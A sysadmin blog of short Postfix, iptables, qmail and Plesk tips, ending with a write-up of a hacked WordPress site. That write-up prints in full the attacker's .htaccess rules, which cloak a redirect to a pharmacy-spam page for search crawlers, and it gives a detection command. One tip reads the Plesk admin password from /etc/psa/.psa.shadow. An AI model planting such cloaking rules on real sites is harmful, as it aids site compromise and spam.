Logging from, to and subject in Postfix

by WanderingTechy October 22, 2014

We needed to analyse the From, To and Subject headers on one of our servers to deal with a persistent spammer.

Add this to your header_checks file (one WARN line per header you want logged):

/^subject:/     WARN
/^from:/        WARN
/^to:/          WARN
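For the checks to fire, main.cf has to point at the file. A minimal sketch (the path is the conventional default, adjust to suit your install):

```
# /etc/postfix/main.cf
header_checks = regexp:/etc/postfix/header_checks
```

Then run `postfix reload`. Each WARN action logs the matching header line to the mail log without affecting delivery, which is exactly what you want for analysis.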

Blocking a spammer with the firewall on a fresh chain

by WanderingTechy October 21, 2014

A client uses fail2ban plus a number of other custom scripts to build his firewall and block unwanted access.  The firewall table was getting very confusing, as he couldn't tell at a glance which script had blocked a given IP.

I cleaned up his tables and created a separate chain for each script.
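The general shape is one dedicated chain per script, jumped to from INPUT, so that `iptables -L -n` shows at a glance which script added which block. A minimal sketch (the chain names and example IP are made up for illustration):

```shell
# one chain per blocking script
iptables -N FAIL2BAN-SSH
iptables -N CUSTOM-HTTP

# route all inbound traffic through them
iptables -I INPUT -j FAIL2BAN-SSH
iptables -I INPUT -j CUSTOM-HTTP

# each script then only ever touches its own chain
iptables -A CUSTOM-HTTP -s 198.51.100.23 -j DROP
```

Because a chain with no matching rule simply returns to the caller, traffic falls through each script's chain in turn and the rest of the ruleset behaves as before.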

Tracking which account is sending spam on a Plesk server

by WanderingTechy October 20, 2014

This is not an easy task without knowing a few tricks, as the log files are not a great deal of help.  Provided you have Plesk greylisting switched on and you know a little SQL and PHP, the task is not that hard.

sqlite3 /var/lib/plesk/mail/greylist/data.db 'select * from data'

The above command will provide you with a list of senders, recipients and IP addresses.  I have written a couple of scripts which monitor this database every 5 minutes and extract spammer signatures, which then get emailed to me.  I usually catch them within 10-15 minutes of them starting their run these days.

Here is a list of the columns in the database:

sqlite> PRAGMA table_info(data);

Using the above and some data from the headers of one of the spam emails, you can quickly extract the sender.

If the spammer is changing the from address so that it doesn't match an account on the server, you can filter the mail logs for the spoofed address instead.
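Something along these lines does the job (the address is a hypothetical spoofed sender lifted from the spam's headers; on a Plesk box the real log to search is /usr/local/psa/var/log/maillog — the sample file below just lets the filter be shown end to end):

```shell
# build a tiny stand-in for the maillog so the filter can be demonstrated
printf '%s\n' \
  'qmail: info msg 1: from=<spoofed@example.com> to=<victim@example.org>' \
  'qmail: info msg 2: from=<real@example.net> to=<victim@example.org>' \
  > /tmp/maillog.sample

# the same grep, pointed at the real maillog, pulls out the spam deliveries
grep 'from=<spoofed@example.com>' /tmp/maillog.sample
```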

qmail: delete all emails from a specific domain in the queue

by WanderingTechy September 22, 2014

I installed qmHandle and tried to delete using wildcards, but it didn't work.

This command, however, does:

/usr/bin/qmhandle.pl -h'\@domain'

flush the qmail queue

by WanderingTechy September 22, 2014

To retry all the emails in the qmail queue, send qmail-send an ALRM signal:

kill -ALRM `ps ax | grep [q]mail-send | awk '{print $1}'`

The [q] in the grep pattern stops the grep command from matching its own entry in the ps output.

SMTP auth spam problems with qmail on Plesk?

by WanderingTechy June 14, 2014

Recently I have been getting quite a few spam problems where spammers were using valid SMTP auth accounts on my server.  They had either dictionary-attacked the account or the password had leaked.

After quite a bit of hacking about I have come up with this single (long) command, which will list any smtp_auth login that has been authorised from 10 or more different IP addresses.  My logs rotate every 24 hours, so I didn't need to filter by date.

THIS WORKS ON:  CentOS 6.5 with Plesk 10.x installed using qmail.  Your mileage may vary.

cat /usr/local/psa/var/log/maillog | grep "smtp_auth" | awk '/logged in from/ {print $8"\t"$14}' | sort -u -k1 | awk '{ print $1 }' | sort | uniq -c |  sed -e 's/^[ \t]*//' | awk '$1 >= 10'

Before anyone comments that I have unnecessary cats and that there are better ways to do this: I want it done in clear, easy-to-understand stages so that when I come back to it later it is still readable.  Don’t use it if you don’t like it…
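Here is the same pipeline run against a synthetic log so each stage can be seen working. The sample line layout is an assumption, arranged purely so that — as in the one-liner above — awk field $8 is the login and $14 is the client IP; real Plesk maillog lines will differ, which is exactly why the field numbers matter:

```shell
# fabricate a maillog extract: one login seen from 12 IPs, one from a single IP
{
  for i in $(seq 1 12); do
    echo "Jun 14 00:00:01 host smtp_auth smtp_auth SMTP-user spammer@example.com : logged in from unknown 198.51.100.$i"
  done
  echo "Jun 14 00:00:02 host smtp_auth smtp_auth SMTP-user alice@example.com : logged in from unknown 203.0.113.7"
} > /tmp/maillog.sample

# identical stages to the one-liner, pointed at the sample file
flagged=$(cat /tmp/maillog.sample \
  | grep "smtp_auth" \
  | awk '/logged in from/ {print $8"\t"$14}' \
  | sort -u -k1 \
  | awk '{ print $1 }' \
  | sort | uniq -c \
  | sed -e 's/^[ \t]*//' \
  | awk '$1 >= 10')
echo "$flagged"
```

Only the login seen from 10 or more distinct IPs survives the final awk, so the output here is the single line `12 spammer@example.com`.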


mod_fcgid: HTTP request length 132330 (so far) exceeds MaxRequestLen (131072)

by WanderingTechy May 27, 2014

If you get unusual errors when uploading a file via HTTP, check the error log.  If you see this error message:

[Tue May 27 17:55:15 2014] [warn] [client] mod_fcgid: HTTP request length 132330 (so far) exceeds MaxRequestLen (131072), referer: http://www.example.com/

Add this to your /etc/httpd/conf.d/fcgid.conf

MaxRequestLen 15728640

This works on CentOS 6.x and should work on others.  The limit can cause problems in software such as forums, WordPress and MediaWiki.
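For reference, the directive sits happily inside the module guard; 15728640 bytes is 15 MB, against the default of 131072 bytes (128 KB):

```
<IfModule mod_fcgid.c>
    MaxRequestLen 15728640
</IfModule>
```

Restart Apache afterwards (`service httpd restart` on CentOS 6) for the change to take effect.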

How to extract a list of domains from a Plesk server

by WanderingTechy May 7, 2014

I needed a list of domains to use in a script for rebuilding a DNS server.

This did the job.

mysql -uadmin -p`cat /etc/psa/.psa.shadow` psa -Ns -e "select name from domains" > domains.txt
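As an illustration of the rebuild step, the list can then be looped over like this (the zone stanza is a generic BIND-style example of my own, not anything Plesk emits, and the sample list stands in for the real domains.txt):

```shell
# stand-in for the real domains.txt produced by the mysql query above
printf '%s\n' example.com example.org > domains.txt

# emit one zone stanza per domain
while read -r domain; do
  printf 'zone "%s" { type master; file "/var/named/%s.db"; };\n' \
    "$domain" "$domain"
done < domains.txt > zones.conf

cat zones.conf
```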

Track down an SMTP user login on a Plesk 9 qmail install.

by WanderingTechy April 23, 2014

A client contacted me today to say he had received an email from his dedicated hosting provider stating that his server was sending out masses of spam.

To track down the SMTP user responsible, use the following command:

grep smtp_auth /usr/local/psa/var/log/maillog

This is valid for qmail on Plesk 9 installs at least; it may work for qmail installs on other servers.

Unusual hack: a WordPress .htaccess redirect for search engines only.

by WanderingTechy September 19, 2013

I had a couple of clients complaining that their WordPress sites had been hacked.

I went to their sites and saw nothing out of place.  A quick check of their index.php files and databases didn’t show anything up, which is where attackers usually strike.

I requested further information, at which point the clients finally mentioned that it was Google that was flagging the sites as compromised and showing pharmacy links.

With this new information, I took a quick look at all the files in each site, hunting for the most recently modified.

ls -lat

is your friend here.
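On a big document root, a recursive variant of the same idea (GNU find, as shipped on CentOS) narrows things down to files changed recently. The demo directory below is just scaffolding so the behaviour can be seen; on a real site you would run the find from the document root:

```shell
# scaffold a fake docroot with one fresh file and one month-old file
mkdir -p /tmp/docroot-demo && cd /tmp/docroot-demo
touch fresh.php
touch -d '30 days ago' old.php

# list files modified within the last 7 days
find . -type f -mtime -7
```

Only fresh.php comes back, which on a hacked site points you straight at the attacker's recent edits.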

This showed that the most recently modified files were the site’s .htaccess file and two PHP files.

A quick look in the files showed the cause and the problem.

# Apache search queries statistic module
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|aol|bing|crawl|aspseek|icio|robot|spider|nutch|slurp|msnbot) [OR]
RewriteCond %{HTTP_REFERER} (google|aol|yahoo|msn|search|bing)
RewriteCond %{REQUEST_URI} /$ [OR]
RewriteCond %{REQUEST_FILENAME} (shtml|html|htm|php|xml|phtml|asp|aspx)$ [NC]
RewriteCond %{REQUEST_FILENAME} !common.php
RewriteCond %{DOCUMENT_ROOT}/common.php -f
RewriteRule ^.*$    /common.php [L]
</IfModule>

The two php files were encrypted using


As you can see, the .htaccess file checks whether the visitor is a search engine and, if so, redirects to common.php, which pumps out the pharma pages/links.
If it is a normal visitor, i.e. you or me, it returns the proper page.

The effect of this is to push the targeted sites up the search rankings by appearing more popular than they actually are.  Google have caught on to this ploy and now tag the sites as compromised.

To fix this, simply delete all three files and reset the FTP password.

In case you are wondering, the users were compromised because they used weak FTP passwords.  They have been educated on this now, and a new password-strength check has been put in place for choosing new passwords.

To do a server-wide test for this hack, use the following command:

find /var/www/vhosts/*/httpdocs/.htaccess -print | xargs grep -l "common.php"

Obviously, change the path if it is different on your server (this one is for a Plesk/CentOS server).